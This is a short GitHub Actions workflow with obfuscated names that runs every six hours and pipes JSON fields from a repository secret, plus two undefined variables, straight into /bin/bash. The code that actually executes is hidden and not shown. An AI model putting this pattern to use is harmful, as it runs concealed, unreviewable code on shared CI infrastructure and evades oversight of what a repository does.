name: kanshiss

on:
  workflow_dispatch:
  schedule:
    - cron: '45 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: kanshiss
        env:
          lcusp96: ${{ secrets.lcusp96 }}
        run: |
          echo $lcusp96 | jq -r .msblw14893 | /bin/bash
          echo $pzmf36563 | jq -r .xwo1851 | /bin/bash
          echo $idwjp62748 | jq -r .e449 | /bin/bash

